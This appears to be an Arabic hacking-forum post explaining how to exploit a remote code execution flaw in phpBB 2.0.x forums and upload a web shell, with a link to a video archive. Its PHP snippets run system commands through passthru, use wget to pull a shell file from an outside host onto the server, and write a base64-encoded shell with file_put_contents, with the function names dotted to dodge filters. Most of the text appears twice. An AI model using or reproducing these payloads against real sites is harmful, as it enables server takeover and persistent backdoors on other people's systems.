[فيديو] استغلال قاعدة بيانات phpbb ورفع شل
اسم الثغرة : Remote Code Execution
الخطوة : High
الاصدارات : phpbb = 2.0.x
الترقيع : ترقية النسخة لآخر اصدار + تعطيل دوال التنفيذ
سمعت عن طرق سابقة شبيهة ولكن الأساليب تختلف ويفضل ان الواحد يطلع ع أكبر قدر من اساليب الوصول لثغرة معينة لأن الواحد مايضمن حالة واحدة مع كل المواقع اللي تواجهه
التطبيق
http://forum.unknown-heroes.com/file...--InjEctOr.rar
هدية خاصة للعناكب..
بدائل عن ماحقن بالتطبيق :
طريقة ثانية :
ممكن انشاء ملف وحقن كود الشل مباشرة فيه :
والطريق كثيرة تحتاج منك فقط للتعرف ع php ودوالها
اللي يبي يتعرف ع الدوال لا يسأل هنا, يروح ع الموقع php.net ويبحث
ThE End
Bay Bay ... $ee y0u
الخطوة : High
الاصدارات : phpbb = 2.0.x
الترقيع : ترقية النسخة لآخر اصدار + تعطيل دوال التنفيذ
سمعت عن طرق سابقة شبيهة ولكن الأساليب تختلف ويفضل ان الواحد يطلع ع أكبر قدر من اساليب الوصول لثغرة معينة لأن الواحد مايضمن حالة واحدة مع كل المواقع اللي تواجهه
التطبيق
http://forum.unknown-heroes.com/file...--InjEctOr.rar
هدية خاصة للعناكب..
بدائل عن ماحقن بالتطبيق :
PHP:
passthr.u('pwd') // كأول مرة, للتعرف ع المسار
passthr.u('wget site.com/shell.php -O /path/shell.php') // لسحب الشل ع هالمسارطريقة ثانية :
ممكن انشاء ملف وحقن كود الشل مباشرة فيه :
PHP:
file_put_conten.ts('/path/shell.php',base.64_decode('encode shell here'));والطريق كثيرة تحتاج منك فقط للتعرف ع php ودوالها
اللي يبي يتعرف ع الدوال لا يسأل هنا, يروح ع الموقع php.net ويبحث
ThE End
Bay Bay ... $ee y0u
اسم الموضوع : [فيديو] استغلال قاعدة بيانات phpbb ورفع شل
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات